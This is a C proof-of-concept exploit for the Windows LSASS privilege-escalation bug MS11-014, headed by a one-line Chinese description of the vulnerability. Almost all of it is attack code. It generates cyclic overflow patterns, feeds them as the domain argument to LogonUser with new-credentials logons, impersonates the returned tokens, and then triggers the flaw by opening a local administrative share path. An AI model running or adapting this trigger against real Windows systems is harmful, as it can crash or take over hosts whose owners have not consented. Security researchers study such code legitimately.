Microsoft Windows  本地安全授权子系统服务(LSASS)进程处理特制的身份验证请求时存在权限提升漏洞，攻击者可利用此漏洞以提升的权限执行代码，从而完全控制受影响系统。
 

// @author      : m_101
// @website     : http://binholic.blogspot.com/
// @licence     : beerware
// @year        : 2012
// @reference   : MS11-014
// @source      : Jorge Moura and http://newsoft-tech.blogspot.com/2012/01/ms11-014-this-is-not-bug-your-are.html
#include <stdio.h>
#include <stdlib.h>

#define _WIN32_WINNT 0x0501
#include <windows.h>
#include <tchar.h>

#include <stdint.h>

#define ALPHA_UPPER     "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
#define ALPHA_LOWER     "abcdefghijklmnopqrstuvwxyz"
#define DIGITS          "0123456789"

// create unique pattern (useful for finding eip offset in bof for example)
// thanks to the msf project for the algorythm
// the code is a dirty hack, could be more optimized
unsigned char* pattern_create (size_t szPattern)
{
    unsigned char **charsets;
    size_t *szCharsets, nCharsets, *offsets, idxPattern;
    long idxOffset;
    //
    unsigned char *pattern;

    if (!szPattern)
        return NULL;

    // pattern
    pattern = calloc (szPattern + 1, sizeof(*pattern));
    if (!pattern)
    {
        return NULL;
    }

    // charsets
    nCharsets = 3;
    charsets = calloc (3, sizeof(*charsets));
    // the charsets
    charsets[0] = strdup(ALPHA_UPPER);
    charsets[1] = strdup(ALPHA_LOWER);
    charsets[2] = strdup(DIGITS);
    // charsets size
    szCharsets = calloc (3, sizeof(*szCharsets));
    szCharsets[0] = sizeof(ALPHA_UPPER) - 1;
    szCharsets[1] = sizeof(ALPHA_LOWER) - 1;
    szCharsets[2] = sizeof(DIGITS) - 1;
    // offsets
    offsets = calloc (nCharsets, sizeof(*offsets));

    // pattern
    pattern = calloc (szPattern + 1, sizeof(*pattern));
    if (!pattern)
    {
        // cleanup
        goto cleanup;
    }

    // we construct pattern
    idxPattern = 0;
    while (idxPattern < szPattern)
    {
        // concat
        //*
        for (idxOffset = 0; idxOffset < nCharsets && idxPattern < szPattern; idxOffset++)
        {
            pattern[idxPattern] = charsets[idxOffset][offsets[idxOffset]];
            idxPattern++;
        }
        //*/
        // increment offset if we wrap back to 0
        idxOffset = nCharsets - 1;
        while (idxOffset >= 0 && ((offsets[idxOffset] = (offsets[idxOffset] + 1) % szCharsets[idxOffset]) == 0))
        {
            //pattern[idxPattern] = charsets[idxOffset][offsets[idxOffset]];
            //idxPattern++;
            idxOffset -= 1;
        }
    }

    // cleanup
cleanup:
    for (idxOffset = 0; idxOffset < nCharsets; idxOffset++)
        free(charsets[idxOffset]);
    free(charsets);
    free(offsets);
    free(szCharsets);

    return pattern;
}

char* byte_repeat(uint8_t byte, size_t n)
{
    char *buffer;

    // alloc buffer
    buffer = calloc(n+1, sizeof(*buffer));
    if (!buffer)
        return NULL;

    memset(buffer, byte, n);

    return buffer;
}

int main(int argc, char *argv[])
{
    char *buffer;
    HANDLE hToken;
    int idx;

    // overflow
    for (idx = 0; idx < 2048; idx += 4)
    {
        buffer = pattern_create(idx);

        LogonUser(
            _T("username"),
            (TCHAR*)buffer,
            _T("password"),
            LOGON32_LOGON_NEW_CREDENTIALS, // defined as 9
            LOGON32_PROVIDER_WINNT50, // defined as 0
            &hToken
        );

        printf("pattern(%5d): %s\n", idx, buffer);

        free(buffer);

        ImpersonateLoggedOnUser(hToken);
    }

    // trigger
    CreateFile(
        _T("\\\\127.0.0.1\\c$\\boot.ini"),
        GENERIC_READ,
        FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL, // security attributes
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    return 0;
}